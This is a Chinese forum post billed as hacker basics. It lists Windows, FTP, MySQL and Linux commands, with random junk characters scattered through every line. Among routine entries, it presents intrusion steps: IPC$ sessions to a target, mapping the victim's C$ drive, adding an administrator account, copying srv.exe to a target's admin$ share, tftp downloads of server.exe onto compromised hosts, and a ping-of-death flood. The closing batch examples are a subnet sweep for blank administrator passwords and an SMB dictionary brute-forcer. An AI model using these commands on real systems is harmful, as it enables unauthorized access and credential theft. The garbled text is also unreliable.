黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 ' S# V4 t0 O/ g' \3 y* c5 l
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
) _# u) T8 S  }net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
& U7 D" D' p3 R. a9 B+ f& \% Fnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: 4 b8 M% S3 r  `- y; T" o
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接
6 u' W/ J& O) n7 \1 Inet use h: /del 删除映射对方到本地的为H:的映射 , S1 C* u" z! ]+ R" T  N1 T1 [
net user 用户名　密码　/add 建立用户
7 X7 {0 @  @) L& Qnet user guest /active:yes 激活guest用户
3 a9 P( X, p. g: {9 d* Lnet user 查看有哪些用户 * x% V5 B+ v" a1 l
net user 帐户名 查看帐户的属性   j# \* m8 A; N# G! _9 @* X2 t# a
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
& X" p: T: _% q" a0 o, Qnet start 查看开启了哪些服务
2 ^6 U3 \* E1 T% F+ ?5 Unet start 服务名　 开启服务；(如:net start telnet， net start schedule) % e6 {" v! u! f) N9 H$ h- F3 e
net stop 服务名 停止某服务
! D9 h5 r* Y8 W6 u- j! \, U! H% ^net time \\目标ip 查看对方时间
4 a2 J* g- @! S1 u0 z, Cnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
  s! M. ^% K7 `9 snet view 查看本地局域网内开启了哪些共享
& c( d3 c  Q( G- [& nnet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
+ S% S/ c7 v" Wnet config 显示系统网络设置
0 [: O" C) j/ I) h  [' C3 Inet logoff 断开连接的共享
/ A/ U; ]: X9 p, @/ o4 Rnet pause 服务名 暂停某服务 " j! m8 B$ e9 n9 C* ?6 n
net send ip "文本信息" 向对方发信息
3 |6 h9 |  d- a" y2 |net ver 局域网内正在使用的网络连接类型和信息
) @# t3 ~/ C0 {; [net share 查看本地开启的共享
4 {: A7 h9 y6 Xnet share ipc$ 开启ipc$共享 & J0 [* G! w! F3 b
net share ipc$ /del 删除ipc$共享 4 w: m. Q$ C( n6 K" }
net share c$ /del 删除C：共享 8 ^0 d% L+ c4 m1 s0 s  `1 P: s9 H
net user guest 12345 用guest用户登陆后用将密码改为12345
- K2 C4 y0 H/ F" K" `8 S* Y. lnet password 密码 更改系统登陆密码 ) g# c7 x6 l) D$ K; e
netstat -a 查看开启了哪些端口,常用netstat -an " Q% |9 s; f4 d9 y
netstat -n 查看端口的网络连接情况，常用netstat -an
. i, d4 e9 Y" @) R: A) G) Fnetstat -v 查看正在进行的工作 9 B' E9 i5 n& g3 O7 d  d9 ?
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
5 U2 {7 r6 K. v% ?* Dnetstat -s 查看正在使用的所有协议使用情况
( i8 R# \* A  J: f! dnbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 0 s6 e" F- ?; t( Q5 x; E8 k7 m
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。   |- M( b" T9 W' ~; J1 Z
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
+ s3 F$ g8 |: |ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping) + u" F6 B) q; f* A
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 8 |0 i) ]  |) F4 s
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) + _& R5 v( J8 W4 c. L
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ) J5 Q4 B3 t; t, r1 d5 x: F$ Y
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 # t1 i- w" t; p6 C. v7 Q( y
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同）
( f$ F6 ?; Z7 S- W) `; D& ymove 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 " G6 W  f- G1 z) m, G+ b' C, C6 r
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
* i. [5 a- R" T5 J  H) b2 A  Nat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务 & p8 b5 u+ i* g& B/ d
at /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止 9 X5 z6 X$ P# v% B' K* Z4 b' z
at id号 /delete 停止某个已注册的计划任务
$ `" [/ j' J' Z! `6 Y4 g, bat 查看所有的计划任务
; _- n, @) L, T3 G+ ?7 Cat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机 % D5 u' p, M1 R+ n8 @9 j9 ]
finger username @host 查看最近有哪些用户登陆 $ p8 G: e' N- r
telnet ip 端口 远和登陆服务器,默认端口为23
$ z# ?; T0 [! o: ]" a0 d: {7 Eopen ip 连接到IP（属telnet登陆后的命令） 2 P/ G$ |& ]& Y" {) f' _
telnet 在本机上直接键入telnet 将进入本机的telnet
5 O2 u+ l0 k# Wcopy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
8 m7 O9 g# v$ a. s# @copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
& I' [( A  M0 s" ocppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件 3 r8 v; p1 ^% Q& p) C8 g. w
copy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C： 3 `8 q) [7 S0 [: ]' D
xcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 . O9 v- \# h6 ^, x5 L3 t3 q
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
* Z! D, v; ?' d, q7 q) e8 R6 rtftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机   o7 _6 l7 y8 P
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) 2 H" t) T' H! V* _% g0 o
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
$ @' N2 [4 f; @0 X5 rarp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 / @) R+ w- g8 N" s1 O. T% v
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 ) v8 y; M8 E* `0 T, j) S% P! Y
mem 查看cpu使用情况 " x; j; E% ~" ?. t9 C9 Q1 o
attrib 文件名(目录名) 查看某文件（目录）的属性
3 c* J  p! |* S" _! D9 u( A/ Cattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
$ Z& ]$ C6 l; |" G: o* U' ydir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间   `" D2 `" o4 r5 z* r& F
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间 3 ?9 c7 F7 T! }3 ]! ]9 K
set 指定环境变量名称=要指派给变量的字符 设置环境变量
& \# ~0 g8 ]4 U) h9 Bset 显示当前所有的环境变量
3 r, n7 w/ i- c/ Y0 iset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 * z  n3 R. |. Q. |6 H6 |
pause 暂停批处理程序，并显示出：请按任意键继续....
7 ^: n; U9 z# a; F( n8 F! }if 在批处理程序中执行条件处理（更多说明见if命令及变量） ; s# p+ Y) y/ d! ?; \2 S% Z
goto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）
" b3 w4 r0 W  @7 D5 s$ e: qcall 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
3 q% q  n) }- \/ w, Yfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） ' \& q4 n! H3 Z. {
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置 : {: x4 ^- Z, o: Y  U
echo 信息 在屏幕上显示出信息
: v* k+ l2 ^: F8 R5 X2 `8 [echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
/ \; ~3 C6 f& `0 ~: G% Lfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello " c$ R) x7 L( b! _1 o1 j1 s
find 文件名 查找某文件 . P/ Z+ s2 O0 @8 j4 Q) k8 V& U
title 标题名字 更改CMD窗口标题名字 4 F! p" o+ I& W5 |9 z
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
4 n! ]$ d# i; J$ K, n8 o4 x. Cprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ ) 5 h; K, K* `4 m) G
print 文件名 打印文本文件
/ h$ y1 ^/ j7 B! Ever 在DOS窗口下显示版本信息 " g; H& e; a/ c8 v8 d. \, e8 a. |* S3 j
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
- B8 @# p) g9 Wformat 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
" D8 U" T2 v7 j# pmd　目录名 创建目录 . _. w1 b9 @) M; h
replace 源文件　要替换文件的目录 替换文件 1 U7 G$ G+ b7 t
ren 原文件名　新文件名 重命名文件名 - V' @( J1 t, ]# [' H. n
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
9 t/ X  E% G1 I/ j6 i) B% htype 文件名 显示文本文件的内容
$ z4 z* ^3 m: ]# ]! E1 t' xmore 文件名 逐屏显示输出文件
( k. O* x( {4 V. r6 K+ F" B$ `doskey 要锁定的命令＝字符+ T8 y9 R% T( G! j) S2 p
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= ! }% o! j: g3 \7 |8 H
taskmgr 调出任务管理器
: P; v1 Z6 a+ Q* hchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 8 l4 X3 C$ u8 p( n1 d! u# L
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
4 A3 k5 \9 W2 k3 Nexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe ) s$ B6 Y. B6 e+ u3 D
path 路径\可执行文件的文件名 为可执行文件设置一个路径。
5 H/ m3 I3 h2 l' k/ G6 lcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
7 U' q; ?' }8 w6 J: S) b2 Xregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示； 3 i3 h6 A+ }9 p, _
regedit /e 注册表文件名 导出注册表
8 |7 ]0 C- h  H5 vcacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
9 o5 U: j. @' ^( A( ^cacls 文件名 查看文件的访问用户权限列表
6 E) P8 J1 {$ |; e. i' z) ~REM 文本内容 在批处理文件中添加注解 7 i  u& ^7 y; I
netsh 查看或更改本地网络配置情况
9 `. B1 a2 |/ P3 V& u' \IIS服务命令：
4 L- l0 m1 R" S3 y4 [  i: niisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） * I! y( |* B+ @# c5 Q( Y
iisreset /start或stop 启动（停止）所有Internet服务
8 u; O) ^$ }1 N" ~iisreset /restart 停止然后重新启动所有Internet服务 ( Y8 M7 ^; w6 h' S4 Z  n* H
iisreset /status 显示所有Internet服务状态 # \5 I" C" c0 S4 D: @2 ?2 Z6 j5 O
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
! O0 u. e% n5 {$ @3 j1 P. k, o/ Ciisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 ( ?& x( Y, N/ M  J7 N
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
1 f  Z, m% T5 w8 qiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 ) z( {( T0 N% y: o* N; W
FTP 命令： (后面有详细说明内容)
! q8 c9 I$ Z3 F; e$ G) Lftp的命令行格式为:5 V* W0 i, D; L# c5 c* U5 ]1 E$ |
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。" S$ E3 Z* N- o* A
－d 使用调试方式。
& x; s5 m& E* t- ~/ L* F－n 限制ftp的自动登录,即不使用.netrc文件。7 u+ O$ W4 T1 D4 I/ }
－g 取消全局文件名。 7 [, r+ ]' @& m/ u
help [命令] 或 ？[命令] 查看命令说明 1 D! ?4 i+ a/ t; v) F9 c
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 2 ?( J/ c+ J: ]# c
pwd 列出当前远端主机目录
1 O/ m; t+ F! \1 p& M$ K  [$ _put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中
8 z+ E" |4 n, P# l- s# p0 uget 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 ( \2 b: M! A" w+ @
mget [remote-files] 从远端主机接收一批文件至本地主机   W, a, ?0 `9 R, @
mput local-files 将本地主机中一批文件传送至远端主机 % b9 M3 p( I5 J, A
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
& w7 i! ]6 I% o% Lascii 设定以ASCII方式传送文件(缺省值)
/ B. Q* Z) X* J9 J$ i4 r) ybin 或 image 设定以二进制方式传送文件 # E0 T; y6 e( A  s
bell 每完成一次文件传送,报警提示 0 Q( `/ [9 i2 H) v
cdup 返回上一级目录
# v' d+ U  ^3 B; e9 z, ~2 Oclose 中断与远程服务器的ftp会话(与open对应)
9 `8 K0 d5 M7 S- Aopen host[port] 建立指定ftp服务器连接,可指定连接端口
8 J' |  S- u- h! a% `' j/ m( Q; ^delete 删除远端主机中的文件
" f# z8 w1 u, _% R5 \# q  d+ ^mdelete [remote-files] 删除一批文件
7 v; F9 c$ r1 Q+ zmkdir directory-name 在远端主机中建立目录 ) g' F) x6 I1 \0 i- y- F  {
rename [from] [to] 改变远端主机中的文件名 ' B8 ^$ y9 J9 h6 ?( N  o7 r0 A- q
rmdir directory-name 删除远端主机中的目录
# n  H& N) D- p' l- B! k$ E. ~/ s9 Tstatus 显示当前FTP的状态   u' a! }% [1 B: x8 D( R/ N
system 显示远端主机系统类型 6 m) {" [7 S- ^. k( |
user user-name [password] [account] 重新以别的用户名登录远端主机 & T0 q. ^# ^: @3 T; e; f( G
open host [port] 重新建立一个新的连接
/ O# W8 N: _6 K5 o" vprompt 交互提示模式
: y" {4 B: h4 Q/ ?( D) m) nmacdef 定义宏命令 ' i0 d/ N+ c% F- O' p
lcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 ; g: N+ P. ^9 i2 v) O0 H
chmod 改变远端主机的文件权限
- o5 l" P9 [2 J6 @0 `8 u4 o% Qcase 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
" A$ J$ U5 T5 s  f) fcd remote－dir 进入远程主机目录 . B6 k1 W) e! S
cdup 进入远程主机目录的父目录 ' D- P$ }5 u0 X& o% f
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
  N( S) G5 {8 o2 I9 v2 T# ZMYSQL 命令： 6 L  O' p/ }) G; v
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。3 @5 s4 R# ~2 P
（例：mysql -h110.110.110.110 -Uroot -P123456 % r. _' m& q5 [9 K% W; w) Q
注:u与root可以不用加空格，其它也一样） ( Z& w* a8 o. T( j0 d) O0 h7 j
exit 退出MYSQL
+ T7 [, x) b  G0 R- @0 w3 fmysqladmin -u用户名 -p旧密码 password 新密码 修改密码
# I5 _- n' P7 L! d  Lgrant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 3 ]/ ?/ P8 ]. R7 i0 s" |
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 $ t% r) |! }* g" g
use mysql；
5 q* B" `& g- ^" Fshow tables; 显示库中的数据表
" g' T; J! B( u# R! @describe 表名; 显示数据表的结构 ) [( u. {; L4 ]1 ?- g
create database 库名; 建库 : [# v  ^5 R# J, d' n8 m" T
use 库名；( J2 \/ v) g% q. g1 M. z& J2 m
create table 表名 (字段设定列表)； 建表
6 i/ o- t. T% q; \drop database 库名;
9 W9 h6 x8 g. kdrop table 表名； 删库和删表 ' V( S% G* t% s1 d( M2 h  V
delete from 表名; 将表中记录清空 $ h6 p, ^4 i' @6 y3 g* z- B2 `
select * from 表名; 显示表中的记录 - E& k" E; w7 g* }
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。 - r4 L: ?) K( W& O
win2003系统下新增命令（实用部份）： / q/ Q9 t0 ?7 Y) d1 N" H* K
shutdown /参数 关闭或重启本地或远程主机。
: p7 I+ o# }( {! Q6 n# o5 e参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
) {9 i, |6 ?( @+ @* v, V! D7 T1 p例：shutdown /r /t 0 立即重启本地主机（无延时） ! E' |1 ^: {+ o  {
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。
, W) I8 {5 V) `% K: V参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。 6 i1 J$ m. q( z% Q4 u3 y
tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。3 B( D' l, @* F0 q* N
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程
# W, D( j$ X1 |) zLinux系统下基本命令： 要区分大小写
9 x$ F9 \- F6 p; Buname 显示版本信息（同win2K的 ver） + x% r9 C) p% X" }: F
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
1 t# r% t# G: X: L5 U* s" ~pwd 查询当前所在的目录位置
- a+ d# c% }6 ]4 A9 G( _cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 " y* r. C8 X) O" C/ @  I
cat 文件名 查看文件内容 + V* o+ u* j! h$ m, Q* s1 |
cat >abc.txt 往abc.txt文件中写上内容。
# g3 ^' _; s/ O7 D6 Imore 文件名 以一页一页的方式显示一个文本文件。
" n; Z8 R" Y$ a# [. B9 Ncp 复制文件 7 `- p7 G5 p3 Q2 w
mv 移动文件 + @/ n9 X; L2 h/ p( n2 W7 n
rm 文件名 删除文件，rm -a 目录名删除目录及子目录 6 i4 |" E( m. E, P8 m  ]
mkdir 目录名 建立目录
# I. z1 T& F$ }rmdir 删除子目录，目录内没有文档。 ! S$ r2 O+ M0 p
chmod 设定档案或目录的存取权限 5 U, e4 W- U9 ]* [- d: }7 T
grep 在档案中查找字符串
1 W6 ^" z2 f6 L$ J; g# C0 A, D. R* Xdiff 档案文件比较
. W% m/ \$ J8 a/ \0 nfind 档案搜寻   y. Y- j) q5 {3 L7 S! h' Z* y
date 现在的日期、时间 , ~6 p" l8 y5 g" z; t6 [0 Q1 O2 R
who 查询目前和你使用同一台机器的人以及Login时间地点 * |  h2 n. ~! s( n+ l$ C
w 查询目前上机者的详细资料 9 t0 p- q! E' b. |4 _* p
whoami 查看自己的帐号名称
3 y& q& D2 t* Y- j3 O4 U' O2 V" X" ugroups 查看某人的Group
) O; z: E& y5 _5 A& ?# u8 Qpasswd 更改密码 " z/ a+ D0 M$ }6 h( q" b1 ^& }
history 查看自己下过的命令
0 j' E3 ]6 L  {7 A% _9 Y, w9 zps 显示进程状态
% u8 M( p3 @7 C) q8 Y0 u5 Lkill 停止某进程
' Q: @* B; O; Y  l: Qgcc 黑客通常用它来编译C语言写的文件 $ n4 H% |/ t* `& D
su 权限转换为指定使用者 , r' t/ u8 J$ ~( d
telnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。 $ s+ Y8 c2 n8 I; R0 @: L
ftp ftp连接上某服务器（同win2K
& w/ g& Z. ?' G1 a9 J$ D附：批处理命令与变量6 L8 \8 v3 E( P7 t* E. ]. |
1：for命令及变量 基本格式：
, A+ g( g5 @6 t9 v4 WFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。- ~7 L7 \/ ^2 D* q
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
3 Y8 Q0 r2 |$ Y3 B" X5 `) }; d(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}; Q! c' g9 p9 K4 q1 V- u
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
" h( ^5 s9 U! f+ a4 A5 K9 j2 Dcommand_parameters：为特定命令指定参数或命令行开关9 p% {0 p" I) R- _
IN (set)：指在(set)中取值；DO command ：指执行command
, W# x* F& m* B参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
: K  E* y" ^* I5 [; K, |$ S用法举例： : Y- T) J% `" ?
@echo off
! @7 X  T  p+ \% A& b0 R5 U( Wecho 用法格式：test.bat *.*.* > test.txt * t; a+ J7 N( U  z
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt 6 }9 q% c' U. ~; F4 o$ M' I- E
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。% U/ v# V7 ^+ V; ^1 g
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
$ W) O7 G) }) ?# @& M# v@echo off - B' K! p" a; {' M( g! [9 y2 ?
echo 用法格式：ok.bat ip
$ d: r4 C) H7 e8 C3 c& IFOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
& t8 \+ r3 C& k4 d6 z9 P存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。& [6 B- d! v. e7 j, G
2：if命令及变量 基本格式： " d6 Z5 }0 f" M! m# v2 d
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。# v. O$ r* b6 x2 @6 C# A3 n) A8 s& q
例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。
& E) @1 L4 V, D: O2 |- T0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
$ Z7 M) _7 ]8 v2 a* PIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
! ^1 s$ U* w3 Y: V" Y/ h例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
. a$ c+ I5 V; r  t2 g: a2 VIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。: D' A  u& Y) F" D- k# P( c
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
" B1 M' M* ]8 ~. c0 s7 D& DIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”